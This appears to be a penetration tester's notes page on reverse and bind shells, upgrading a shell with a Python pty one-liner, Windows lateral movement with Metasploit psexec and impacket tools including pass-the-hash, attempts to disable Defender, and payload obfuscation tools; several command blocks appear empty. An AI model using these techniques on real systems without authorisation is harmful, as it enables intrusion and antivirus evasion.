Shells
Reverse Shell
We are starting a listener on our machine and we are triggering a connection from the target machine to ourselves.
Useful for internal engagements or when we have access to the firewall we are behind
Sometimes they don't work for various reasons
Bind Shell
Opposite of a reverse shell, we connect to the target machine
Useful if we are able to open a port on the target firewall
Making our shell more friendly
Usually a reverse shell will not be very friendly, no prompt, no autocomplete or clear, sometimes the echo is weird etc. There are a few days to fix this:
If Python is available on the machine, we can spawn a pty shell:
python -c 'import pty; pty.spawn("/bin/bash")'After doing this, there are a few quality of life changes you can make
background the shell
ctrl+zstty raw -echofg [enter] [enter]this will bring you back into the shell
export TERM=xterm
If you find that python is not on the machine, you can still get a shell that's a little better:
Windows
Many times on Windows, the AV will block these attemps - we can try to disable it with the following in Powershell:
Metasploit
We can use the psexec module in metasploit and then provide username and password or username and hash
When using this module, set your payload appropriately
for this instance we used windows/x64/meterpreter/reverse_tcp
psexec.py
this tool is a bit quieter and harder to detect:
Can use hashes as well with the
-hashes [hash]flag
wmiexec.py
Uses the same syntax as psexec
smbexec.py
Uses the same syntax as psexec
IN ALL OF MY ATTEMPTS WITH WINDOWS 11 ALL OF THESE ATTEMPTS WERE CAUGHT.
Even using a Group Policy to turn off Windows Defender Antivirus, disabling Tamper mode, restarting the machines, Windows Defender came back on after some time and caught the attempts.
Payloads
msfvenom is a great tool for building payloads
darkarmour is also great for building payloads and obfuscating them: https://github.com/bats3c/darkarmour
Many prebuild payloads can be found at the following repositories:
Last updated